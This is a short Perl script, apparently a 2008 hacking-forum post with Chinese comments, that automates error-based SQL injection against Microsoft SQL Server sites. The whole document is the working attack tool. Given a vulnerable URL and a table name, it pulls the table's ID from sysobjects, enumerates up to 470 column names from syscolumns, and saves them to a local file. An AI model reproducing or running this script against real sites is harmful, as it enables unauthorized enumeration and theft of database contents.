perl在mssql注入中爆表列

#!/usr/bin/perl -w
#Codz By N3tl04D  
#Date 2008-4-13


use strict;
use LWP;

if(@ARGV != 2){
    print "用法：$0 注入点 表名";
    exit;
}

my $browser;
my $start=time();
my $talbe=$ARGV[1];
my $vul=$ARGV[0];

sub do_GET {
  $browser = LWP::UserAgent->new unless $browser;
  my $resp = $browser->get(@_);
  return ($resp->content, $resp->status_line, $resp->is_success, $resp)
    if wantarray;
  return unless $resp->is_success;
  return $resp->content;
}

my $tabl="$vul%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))";
my ($content, $status, $is_success) = do_GET($tabl);

if ($content =~ m{value \'(.+?)\'}gi)
    {
        print "得到表ID:$1\n";
  open(FILE,">>e:/perl/count.txt") || die ("Could not open file");
  print FILE "===============================================================\n表名:$talbe ID:$1\n";
  close(FILE);
  crake($1);
    } else {
  print "不能爆表\n";
  last;
    }

sub crake {
    my @arr1=();
    for (my $j=1;$j<=470;$j++) {
    print "猜解第$j个表列\n";
    my @arr=join("','",@arr1);
    my $url="$vul%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=$_[0]%20and%20name%20not%20in('@arr'))";
    
    my ($content, $status, $is_success) = do_GET($url);
    if ($content =~ m{value \'(.+?)\'}gi)
  {
    print "得到表列:$1\n";
    push(@arr1,$1);
    save($1);
  } else {
      print "猜解完成\n";
      last;
  }  
    }
}


my $end=time();
my $time=$end-$start;
print "用时".$time."秒\n";

sub save {
  open(FILE1,">>e:/perl/count.txt") || die ("Could not open file");
  print FILE1 "-$_[0]\n";
  close(FILE1);

}